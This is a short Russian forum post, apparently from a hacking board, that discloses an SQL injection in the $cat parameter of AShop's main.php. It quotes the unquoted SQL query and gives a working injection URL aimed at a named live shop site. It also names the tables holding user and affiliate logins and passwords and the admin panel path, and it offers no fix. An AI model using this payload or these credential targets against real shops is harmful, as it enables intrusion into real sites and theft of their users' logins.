AShop - онлайн магазин с поддержкой партнерской программы с открытым кодом продается на плати.ру. (Не путать с ASHOP Software). Возможна SQL-инъекция в параметре $cat в main.php. Пример уязвимой части скрипта: PHP: ....... // List categories... if ($cat) { $sql="SELECT parentcategoryid from category WHERE categoryid = $cat"; $result = @mysql_query($sql,$db); $parent = @mysql_result($result, 0, "parentcategoryid"); } ........ $cat не обрамляется кавычками, передается через GET параметры. Пример использования уязвимости, правда на 3 мускуле: Code: http://muzplakat.ru/main.php?cat=6+/*!32358+and+0+*/ Таблицы: affiliate(user,password,mail) и user(user, password). Админка: /admin/index.php ЗЫ Скрипт не особо распространен в сети =\ ЗЗЫ Спасибо Alexsize, за предоставленные скрипты магаза =)
